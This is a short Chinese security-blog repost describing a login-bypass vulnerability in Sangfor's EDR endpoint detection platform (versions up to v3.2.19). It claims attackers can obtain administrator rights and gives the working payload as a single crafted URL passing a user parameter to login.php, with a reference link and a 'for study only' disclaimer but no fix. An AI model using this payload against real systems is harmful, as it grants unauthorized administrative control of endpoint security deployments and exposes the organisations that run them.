记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

SXF终端检测响应平台任意用户登录0day复现

2020-08-20 10:56

大早起来看其他大佬都在发,萌新得我也水一波

0x01 漏洞描述

  深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。

      攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限

0x02 漏洞复现

PAYLOAD:

https://xxx.xxx/ui/login.php?user=username

0x03 影响范围

EDR  <= v3.2.19


0x04 参考链接

https://www.yuque.com/pmiaowu/hcy2bz/fp4icw?from=groupmessage




仅供学习参考,切勿用于非法用途


知识来源: https://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247484341&idx=1&sn=1c53e8362f6b9ce446b3340cf8844253&chksm=ea37fcefdd4075f9df2dbfedde99933a78179fe2ac26f50b47bf890116090dac940df6585686&scene=126&

阅读:12650 | 评论:0 | 标签:0day

想收藏或者和大家分享这篇好文章→复制链接地址

“SXF终端检测响应平台任意用户登录0day复现”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云